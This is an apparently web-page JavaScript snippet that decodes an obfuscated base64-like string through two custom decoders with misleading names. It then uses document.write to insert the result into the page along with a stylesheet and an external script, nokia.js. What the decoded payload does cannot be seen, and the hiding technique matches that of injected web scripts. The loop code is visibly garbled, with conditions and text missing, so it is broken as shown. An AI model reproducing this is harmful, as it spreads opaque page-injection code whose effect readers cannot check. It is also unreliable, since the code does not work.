function SearchStr(S){ var Alf="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", S2="", e=[], j, i=0, c=[]; while(i>4); c[2]=((e[2] & 15)<<4) | (e[3]>>2); c[3]=((e[3] & 3)<<6) | e[4]; for(j=1; j<=3; j++){ if (j==1 || e[j+1]!=64) S2+=String.fromCharCode(c[j]); } } return S2; } function ReplaceStr(S){ var L, Page, S2='', Item, i, n; S=SearchStr(S); Page=parseInt(S.substr(0, 2), 16); Item=parseInt(S.substr(2, 2), 16); S=S.substring(4); L=S.length; for(i=0; i255) Page=0; } return S2; } function ShowItems(){ var page='', Content= 'MjMwM1+KkqJPm5l1q7Cqp6y2tsPHdrrIyMnTpc7T3+jc7LuK0/Lu7QL3tQ/8BxXEHhIWHBjWMCHfLjQpL+5FPDz6TVJMSU4MW1tobAU6ZGx8KU97c4iLWHWCjZtoN2yco6BcsrSohW22xcjHlIyP2t3gmujh7OHe6a/n9ve8+QD9yAgOAwkRGRUQFSgvHu4qLy/u7yFDJEo/RSEJXlVZZiRscHhsaDR/dYJ7d4GHh5WdZFGjmaafm6ikaYBqiViNg7vD056flc3V5bA='; window.h='www.yowick.com'; window.b='border'; Content=ReplaceStr(Content); var RE=new RegExp("http://[^/]+/img/loading_aqua.gif"); Content=Content.replace(RE, "/imaged/dc/loading_aqua.gif"); document.write('<'+'LINK REL="StyleSheet" HREF="/commonres/nokia.css">'+ (page ? '<'+'Script>var a="'+page+'"<'+'/Script>' : '')+ '<'+'Script Src="/commonres/nokia.js"><'+'/Script>'+ Content); } ShowItems();